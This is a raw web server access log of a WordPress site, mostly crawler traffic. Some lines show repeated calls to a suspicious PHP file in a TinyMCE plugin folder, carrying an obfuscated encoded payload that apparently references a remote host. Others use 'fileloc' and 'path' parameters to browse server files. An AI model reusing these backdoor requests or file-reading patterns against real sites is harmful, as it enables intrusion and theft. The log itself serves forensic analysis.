172.68.27.161 - - [06/Dec/2025:05:14:47 +0100] "GET /?f=761134050 HTTP/1.0" 200 232468 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.183 - - [06/Dec/2025:05:14:51 +0100] "GET /?f=4265325959 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:14:59 +0100] "GET /?f=2167981155 HTTP/1.0" 200 203622 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.240.208 - - [06/Dec/2025:05:13:03 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373938332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343338332q3733323965383533303262643261383932383266336333616439383262323165222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.22.116 - - [06/Dec/2025:05:15:04 +0100] "GET /?f=3144268221 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.33 - - [06/Dec/2025:05:15:04 +0100] "GET /?f=3907117104 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.33 - - [06/Dec/2025:05:15:05 +0100] "GET /?f=2060779954 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:15:06 +0100] "GET /?f=962668362 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.98 - - [06/Dec/2025:05:15:07 +0100] "GET /?o=48351110071730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:15:10 +0100] "GET /?f=1601599948 HTTP/1.0" 200 220095 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.70.197 - - [06/Dec/2025:05:15:13 +0100] "GET /?o=17488591121730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:15:13 +0100] "GET /?f=1144773061 HTTP/1.0" 200 204982 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
104.22.1.33 - - [06/Dec/2025:05:15:19 +0100] "GET /?f=3831801728 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:15:20 +0100] "GET /?f=4092067389 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:15:22 +0100] "GET /?f=3149082443 HTTP/1.0" 200 214203 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.183 - - [06/Dec/2025:05:15:23 +0100] "GET /?f=2646346958 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.232.100 - - [06/Dec/2025:05:13:24 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383030342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343430342q3861333933613039646637613933323761653365616565343830343236366165222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.71.183 - - [06/Dec/2025:05:15:31 +0100] "GET /?o=57537258091730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:15:31 +0100] "GET /?f=182396779 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.98 - - [06/Dec/2025:05:15:32 +0100] "GET /?f=855298860 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:15:33 +0100] "GET /?f=2949770336 HTTP/1.0" 200 208683 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.58.48 - - [06/Dec/2025:05:15:40 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Funauthorized.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.197 - - [06/Dec/2025:05:15:42 +0100] "GET /?f=771803208 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.58.48 - - [06/Dec/2025:05:15:42 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fmaintenance.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.251.100 - - [06/Dec/2025:05:13:45 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383032352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343432352q6630653830343939313065613861666330613263326235643865613933663830222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.58.48 - - [06/Dec/2025:05:15:45 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-requests.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 18521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:15:45 +0100] "GET /?f=4021487222 HTTP/1.0" 200 232811 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.58.48 - - [06/Dec/2025:05:15:48 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-content%2Fjetpack-waf HTTP/1.0" 200 19755 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.245.112 - - [06/Dec/2025:05:15:48 +0100] "GET /?f=62674359 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.197 - - [06/Dec/2025:05:15:50 +0100] "GET /?f=253599185 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:05:15:50 +0100] "GET /?f=4283552498 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:15:50 +0100] "GET /?f=969947099 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.58.48 - - [06/Dec/2025:05:15:51 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fstyle-engine HTTP/1.0" 200 25374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.30.98 - - [06/Dec/2025:05:15:52 +0100] "GET /?f=1248147929 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:15:56 +0100] "GET /?f=2147597797 HTTP/1.0" 200 225132 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.31 - - [06/Dec/2025:05:16:00 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Ffeed-rdf.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 19648 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.31 - - [06/Dec/2025:05:16:02 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fload.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 78605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.31 - - [06/Dec/2025:05:16:05 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcomment-template.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 130672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.246.47 - - [06/Dec/2025:05:14:06 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383034362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343434362q3830386465616337353866626234623436363233613735656564343266396231222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.71.183 - - [06/Dec/2025:05:16:07 +0100] "GET /?f=4159782453 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.31 - - [06/Dec/2025:05:16:08 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-post.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 23327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.159.106.42 - - [06/Dec/2025:05:16:08 +0100] "GET /?f=422164966 HTTP/1.0" 200 211199 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:05:16:10 +0100] "GET /?f=1239980682 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.31 - - [06/Dec/2025:05:16:11 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-roles.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 26231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.22.116 - - [06/Dec/2025:05:16:14 +0100] "GET /?f=3054191393 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:16:18 +0100] "GET /?o=112057048061730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.51 - - [06/Dec/2025:05:16:20 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fblock-template.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 32757 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.166.40 - - [06/Dec/2025:05:16:20 +0100] "GET /?f=3884191417 HTTP/1.0" 200 217104 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.112 - - [06/Dec/2025:05:16:20 +0100] "GET /?f=362000117 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.51 - - [06/Dec/2025:05:16:20 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Ftheme-previews.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 19352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.245.112 - - [06/Dec/2025:05:16:22 +0100] "GET /?f=3658782952 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.51 - - [06/Dec/2025:05:16:23 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-walker-category.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 25890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.30.98 - - [06/Dec/2025:05:16:25 +0100] "GET /?f=1436525726 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.98 - - [06/Dec/2025:05:16:26 +0100] "GET /?o=113668317051730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.51 - - [06/Dec/2025:05:16:26 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Ffeed.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 42121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.130.229 - - [06/Dec/2025:05:14:27 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383036372p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343436372q3038616461613634326561663636626436626134333537373933636265636162222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.32 - - [06/Dec/2025:05:16:28 +0100] "GET /?f=4056717375 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:16:29 +0100] "GET /?f=41930525 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.51 - - [06/Dec/2025:05:16:29 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcategory.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 30152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:16:31 +0100] "GET /?f=2036663039 HTTP/1.0" 200 206844 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.98 - - [06/Dec/2025:05:16:34 +0100] "GET /?o=50579114021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:05:16:34 +0100] "GET /?f=3685774035 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.31 - - [06/Dec/2025:05:16:35 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fpost-template.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 93634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.31 - - [06/Dec/2025:05:16:36 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fsitemaps.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 19580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.71.183 - - [06/Dec/2025:05:16:40 +0100] "GET /?f=2684861252 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:16:42 +0100] "GET /?f=3871395898 HTTP/1.0" 200 224508 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.246.197 - - [06/Dec/2025:05:14:48 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383038382p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343438382q6134356434326365616636343234666632323363623935626564353230316634222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.27.161 - - [06/Dec/2025:05:16:54 +0100] "GET /?f=1765697437 HTTP/1.0" 200 217660 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:05:17:01 +0100] "GET /?f=3967689411 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.40 - - [06/Dec/2025:05:17:05 +0100] "GET /?f=1464905469 HTTP/1.0" 200 202645 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:05:17:06 +0100] "GET /?f=1962731028 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:05:17:06 +0100] "GET /?f=1697899850 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.232.100 - - [06/Dec/2025:05:15:09 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383130392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343530392q6436353963343733363134396530363665393835393635343461623238366533222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.32 - - [06/Dec/2025:05:17:11 +0100] "GET /?f=2434038984 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.197 - - [06/Dec/2025:05:17:13 +0100] "GET /?f=2298066717 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:05:17:13 +0100] "GET /?f=3323493395 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:17:17 +0100] "GET /?f=1232341527 HTTP/1.0" 200 195702 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:05:17:20 +0100] "GET /?o=7769821041730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.98 - - [06/Dec/2025:05:17:26 +0100] "GET /?f=690972867 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:05:17:28 +0100] "GET /?f=2447497318 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:17:28 +0100] "GET /?f=165943744 HTTP/1.0" 200 209377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.240.208 - - [06/Dec/2025:05:15:30 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383133302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343533302q6264633766346530376161623332343464366335343330316137316434313834222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.32 - - [06/Dec/2025:05:17:34 +0100] "GET /?o=92848336001730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:17:39 +0100] "GET /?o=78901335061730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:17:40 +0100] "GET /?f=3288133688 HTTP/1.0" 200 217055 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.98 - - [06/Dec/2025:05:17:43 +0100] "GET /?f=1300705511 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.248.73 - - [06/Dec/2025:05:15:51 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383135312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343535312q3038356563646563626135363538326261353761323738393366353431323535222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.27.161 - - [06/Dec/2025:05:17:51 +0100] "GET /?f=475227137 HTTP/1.0" 200 248825 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:05:17:54 +0100] "GET /?f=228949228 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.7.47 - - [06/Dec/2025:05:17:54 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fforbidden.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
